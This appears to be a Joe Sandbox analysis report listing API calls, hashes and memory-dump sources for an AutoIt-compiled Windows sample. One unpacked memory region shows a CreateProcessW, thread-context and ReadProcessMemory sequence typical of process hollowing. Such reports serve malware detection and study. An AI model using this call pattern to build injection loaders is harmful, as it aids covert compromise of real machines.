  • Part of subcall function 00C13A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CE1418,?,00C12E7F,?,?,?,00000000), ref: 00C13A78
  • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
• GetForegroundWindow.USER32(runas,?,?,?,?,?,00CD2224), ref: 00C52C10
• ShellExecuteW.SHELL32(00000000,?,?,00CD2224), ref: 00C52C17
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
• String ID: runas
• API String ID: 448630720-4000483414
• Opcode ID: 56e614a3d8627533036c3948bbe2dc933a0a568f25fc9b255f9d8db06e618a95
• Instruction ID: 043c371ec30d91d6f84e777cb1e76fb961f4dc176c549995510bac20d38490db
• Opcode Fuzzy Hash: 56e614a3d8627533036c3948bbe2dc933a0a568f25fc9b255f9d8db06e618a95
• Instruction Fuzzy Hash: D611D2312083819BC714FF60D8A1AFE77A49B93314F48142EB593061A2CF308ADAB752
APIs
• GetInputState.USER32 ref: 00C1D807
• timeGetTime.WINMM ref: 00C1DA07
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C1DB28
• TranslateMessage.USER32(?), ref: 00C1DB7B
• DispatchMessageW.USER32(?), ref: 00C1DB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C1DB9F
• Sleep.KERNEL32(0000000A), ref: 00C1DBB1
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
• String ID:
• API String ID: 2189390790-0
• Opcode ID: 47c827307a4c5e6bfd2fd2c00acdf45662a101ed54050f201d4b49357ccbdfef
• Instruction ID: 90e365294742a14d75217ce096e4bc14b5023af810bcd387cbabac1582fb299d
• Opcode Fuzzy Hash: 47c827307a4c5e6bfd2fd2c00acdf45662a101ed54050f201d4b49357ccbdfef
• Instruction Fuzzy Hash: B842D130608741EFD738CF25C894BAAB7E0BF86314F18455DE8668B291D774E984EB92

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00C12D07
• RegisterClassExW.USER32(00000030), ref: 00C12D31
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C12D42
• InitCommonControlsEx.COMCTL32(?), ref: 00C12D5F
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C12D6F
• LoadIconW.USER32(000000A9), ref: 00C12D85
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C12D94
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 36a716933413980eb2cb5f4cf1b4d77d3d1495a68966a44cfb71b26ed5d91faf
• Instruction ID: 1c7d4c877c04d4dfb3d4564492cf2e7cd79d5ae21b4bb76a43912dfe3b0da3b6
• Opcode Fuzzy Hash: 36a716933413980eb2cb5f4cf1b4d77d3d1495a68966a44cfb71b26ed5d91faf
• Instruction Fuzzy Hash: CA21C0B5901258AFDB00DFA4E889BEDBBB4FB09704F04811AF911AB2A0D7B54594CFA1

Control-flow Graph

APIs
  • Part of subcall function 00C5039A: CreateFileW.KERNELBASE(00000000,00000000,?,00C50704,?,?,00000000,?,00C50704,00000000,0000000C), ref: 00C503B7
• GetLastError.KERNEL32 ref: 00C5076F
• __dosmaperr.LIBCMT ref: 00C50776
• GetFileType.KERNELBASE(00000000), ref: 00C50782
• GetLastError.KERNEL32 ref: 00C5078C
• __dosmaperr.LIBCMT ref: 00C50795
• CloseHandle.KERNEL32(00000000), ref: 00C507B5
• CloseHandle.KERNEL32(?), ref: 00C508FF
• GetLastError.KERNEL32 ref: 00C50931
• __dosmaperr.LIBCMT ref: 00C50938
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 35a7adf53de6d4f703e6893153b5827e42c5896310c07152b4f0b1f9018ea977
• Instruction ID: 30d99db9e7d8987fb7ddf2dd052cac0213afdccb5a6eb3ea9ddab646c7530014
• Opcode Fuzzy Hash: 35a7adf53de6d4f703e6893153b5827e42c5896310c07152b4f0b1f9018ea977
• Instruction Fuzzy Hash: 9EA12636A101448FDF19AF68D891BAE3BA0AB06321F24015DFC21DF2E2DB319957DB95

Control-flow Graph

APIs
  • Part of subcall function 00C13A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CE1418,?,00C12E7F,?,?,?,00000000), ref: 00C13A78
  • Part of subcall function 00C13357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C13379
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C1356A
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C5318D
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C531CE
• RegCloseKey.ADVAPI32(?), ref: 00C53210
• _wcslen.LIBCMT ref: 00C53277
• _wcslen.LIBCMT ref: 00C53286
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 98802146-2727554177
• Opcode ID: e867557ba1ee7cca523b41a5b8331571abff18de0270d266e31c867408b4a5e6
• Instruction ID: 8687072356afe90e85c7c45855d5cd7d6f0c682baf913dfb78799dff174b804e
• Opcode Fuzzy Hash: e867557ba1ee7cca523b41a5b8331571abff18de0270d266e31c867408b4a5e6
• Instruction Fuzzy Hash: 297148714043819AC314DF65EC82BAFBBECBB86744F40042EF555861B1EB749A89AB62

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00C12B8E
• LoadCursorW.USER32(00000000,00007F00), ref: 00C12B9D
• LoadIconW.USER32(00000063), ref: 00C12BB3
• LoadIconW.USER32(000000A4), ref: 00C12BC5
• LoadIconW.USER32(000000A2), ref: 00C12BD7
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C12BEF
• RegisterClassExW.USER32(?), ref: 00C12C40
  • Part of subcall function 00C12CD4: GetSysColorBrush.USER32(0000000F), ref: 00C12D07
  • Part of subcall function 00C12CD4: RegisterClassExW.USER32(00000030), ref: 00C12D31
  • Part of subcall function 00C12CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C12D42
  • Part of subcall function 00C12CD4: InitCommonControlsEx.COMCTL32(?), ref: 00C12D5F
  • Part of subcall function 00C12CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C12D6F
  • Part of subcall function 00C12CD4: LoadIconW.USER32(000000A9), ref: 00C12D85
  • Part of subcall function 00C12CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C12D94
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 1e8d95ca539a424fa21e4a85b22152be31a50f8e700745a489dc7f95bbc2b61a
• Instruction ID: 19a7c52f90b5c3769f736ce362bbd25ec9bb12484476cf9ad94fbf5ac86883ab
• Opcode Fuzzy Hash: 1e8d95ca539a424fa21e4a85b22152be31a50f8e700745a489dc7f95bbc2b61a
• Instruction Fuzzy Hash: 87210974E00358ABDB109FA5ECD5BAD7FB4FB49B54F08001AEA00AB6B0D7B115A0DF90

Control-flow Graph

                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00C1316A,?,?), ref: 00C131D8
                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00C1316A,?,?), ref: 00C13204
                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C13227
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00C1316A,?,?), ref: 00C13232
                                                                                      • CreatePopupMenu.USER32 ref: 00C13246
                                                                                      • PostQuitMessage.USER32(00000000), ref: 00C13267
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                      • String ID: TaskbarCreated
                                                                                      • API String ID: 129472671-2362178303
                                                                                      • Opcode ID: 039ac230a89d2739593066b7c360b7df18809a245513bd8cbedca2e4ded0b36c
                                                                                      • Instruction ID: d46796c791ab758441ec2adf3e18bdbcba7e6592128a4572dddf4386568b1ef1
                                                                                      • Opcode Fuzzy Hash: 039ac230a89d2739593066b7c360b7df18809a245513bd8cbedca2e4ded0b36c
                                                                                      • Instruction Fuzzy Hash: 6B4104353402C4ABDF156B789D8EBFD3A59E707348F180125FD229A1A2CB718BD0B7A5

                                                                                      Control-flow Graph
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014E1FB1
                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014E21D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_14df000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileFreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 204039940-0
                                                                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                      • Instruction ID: 5c64279c1234a341c3f9ef270af726ee7124712b446e390b85fdd54d66c51e3a
                                                                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                      • Instruction Fuzzy Hash: A2A10874E00209EBDB14CFA4C958FAEBBB5FF48305F10815AE601BB291C7B59A41CB94

                                                                                      Control-flow Graph
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C12C91
                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C12CB2
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C11CAD,?), ref: 00C12CC6
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C11CAD,?), ref: 00C12CCF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CreateShow
                                                                                      • String ID: AutoIt v3$edit
                                                                                      • API String ID: 1584632944-3779509399
                                                                                      • Opcode ID: 04508420b977fb657a491599c7604e435da302b71b7bc093500f792bc9eb9996
                                                                                      • Instruction ID: cc0d41caf27f697318ed4449e5c5936f409a6610955256f16a3eda67aebd9d68
                                                                                      • Opcode Fuzzy Hash: 04508420b977fb657a491599c7604e435da302b71b7bc093500f792bc9eb9996
                                                                                      • Instruction Fuzzy Hash: 32F0DA755402D47AEB311B27AC88F7B2EBDD7C7F54B04005AFD00AB5B0C6755861DAB0

                                                                                      Control-flow Graph
                                                                                      APIs
                                                                                        • Part of subcall function 014E1BB0: Sleep.KERNELBASE(000001F4), ref: 014E1BC1
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014E1DD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_14df000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileSleep
                                                                                      • String ID: X4UVO3E0MP5J
                                                                                      • API String ID: 2694422964-555495244
                                                                                      • Opcode ID: adff3ce46d64045890554bc584fbb9e08203bd8ce1765d6f680d0dff634e6667
                                                                                      • Instruction ID: d3754af7e05bce0d68328c622c9729436387647aed7a16878ee67a59fe7c4f49
                                                                                      • Opcode Fuzzy Hash: adff3ce46d64045890554bc584fbb9e08203bd8ce1765d6f680d0dff634e6667
                                                                                      • Instruction Fuzzy Hash: F2519230D54249EBEF10DBE4C818BEFBBB5AF14701F004199E608BB2D0D6791B45CBA5

                                                                                      Control-flow Graph
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C13B0F,SwapMouseButtons,00000004,?), ref: 00C13B40
                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C13B0F,SwapMouseButtons,00000004,?), ref: 00C13B61
                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00C13B0F,SwapMouseButtons,00000004,?), ref: 00C13B83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Control Panel\Mouse
                                                                                      • API String ID: 3677997916-824357125
                                                                                      • Opcode ID: 4428a9c7172f713559f41ab369e4d79d6479e0a584d309a084dbf5b453deedfe
                                                                                      • Instruction ID: e54e318c08de62905dd884eedb3853afc9dd9e293f29e7bae4cf01f05654693b
                                                                                      • Opcode Fuzzy Hash: 4428a9c7172f713559f41ab369e4d79d6479e0a584d309a084dbf5b453deedfe
                                                                                      • Instruction Fuzzy Hash: C6112AB5514248FFDB208FA5DC84AEFB7B8EF06748B104459A805D7110E2319F80A760

                                                                                      Control-flow Graph
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 014E136B
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014E1401
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014E1423
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_14df000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                      • Instruction ID: 53d557651ed933045c4f4c78003aa7676d39f4e00fe8a0da0268e392327f4bbd
                                                                                      • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                      • Instruction Fuzzy Hash: 9C623B30A54258DBEB24CFA4C844BDEB376EF58701F1091A9D20DEB3A0E7759E81CB59
                                                                                      Strings
                                                                                      • Variable must be of type 'Object'., xrefs: 00C632B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Variable must be of type 'Object'.
                                                                                      • API String ID: 0-109567571
                                                                                      • Opcode ID: 25237da4c43350128c5bd52d63e1edad9245ecf3c35aaeca322f0676d6ab7382
                                                                                      • Instruction ID: 7da0abfe605f0f084025cb4b4cfe46cca7c70a30b66b9f3f026f540c2d0f9ba8
                                                                                      • Opcode Fuzzy Hash: 25237da4c43350128c5bd52d63e1edad9245ecf3c35aaeca322f0676d6ab7382
                                                                                      • Instruction Fuzzy Hash: A0C27071A00215CFDB24CF59C880BADB7B1BF0A310F248569ED56AB391D375EE82EB51

                                                                                      Control-flow Graph
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C533A2
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C13A04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                                      • String ID: Line:
                                                                                      • API String ID: 2289894680-1585850449
                                                                                      • Opcode ID: 54a9afaa60c88d3bd8fd072d159031c8603ee68129b03e2b243dbab99ade9b10
                                                                                      • Instruction ID: 202999eec10112e3722dd0046e4c040657baebdadd9527c5fb9dc0e535ad1169
                                                                                      • Opcode Fuzzy Hash: 54a9afaa60c88d3bd8fd072d159031c8603ee68129b03e2b243dbab99ade9b10
                                                                                      • Instruction Fuzzy Hash: D931F471408380AAC321EB20DC45BEFB7D8AF46714F04052AF9A9930A1DB709799E7C2
                                                                                      APIs
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00C30668
                                                                                        • Part of subcall function 00C332A4: RaiseException.KERNEL32(?,?,?,00C3068A,?,00CE1444,?,?,?,?,?,?,00C3068A,00C11129,00CD8738,00C11129), ref: 00C33304
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00C30685
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                      • String ID: Unknown exception
                                                                                      • API String ID: 3476068407-410509341
                                                                                      • Opcode ID: e0da451bdfc01eeaa9a2610bf5ef77a12ea024720d51d24bd415791d1045c4ce
                                                                                      • Instruction ID: f9ad7160a77ac0d975ef6911af2f38b09e0c2e160a441f63e1f4e2a7f52f226c
                                                                                      • Opcode Fuzzy Hash: e0da451bdfc01eeaa9a2610bf5ef77a12ea024720d51d24bd415791d1045c4ce
                                                                                      • Instruction Fuzzy Hash: 0EF0CD3591020DB7CB00BAA9E856C9E7B7C9E00310F704536B924D6996EF71EB6ADA90
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C982F5
                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00C982FC
                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C984DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 146820519-0
                                                                                      • Opcode ID: 029f677f4f43a543e42a633106d7d91e345d1273722a7894a25e2f6ed127a6bc
                                                                                      • Instruction ID: bedad964b19eb332fd981f9b2fb6ea5268522afc49d86ba49fd41fbfa3cc9dfa
                                                                                      • Opcode Fuzzy Hash: 029f677f4f43a543e42a633106d7d91e345d1273722a7894a25e2f6ed127a6bc
                                                                                      • Instruction Fuzzy Hash: 43126C719083019FDB14DF28C494B6ABBE5FF86318F14895DE8998B352CB31E949CF92
                                                                                      APIs
                                                                                        • Part of subcall function 00C11BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C11BF4
                                                                                        • Part of subcall function 00C11BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C11BFC
                                                                                        • Part of subcall function 00C11BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C11C07
                                                                                        • Part of subcall function 00C11BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C11C12
                                                                                        • Part of subcall function 00C11BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C11C1A
                                                                                        • Part of subcall function 00C11BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C11C22
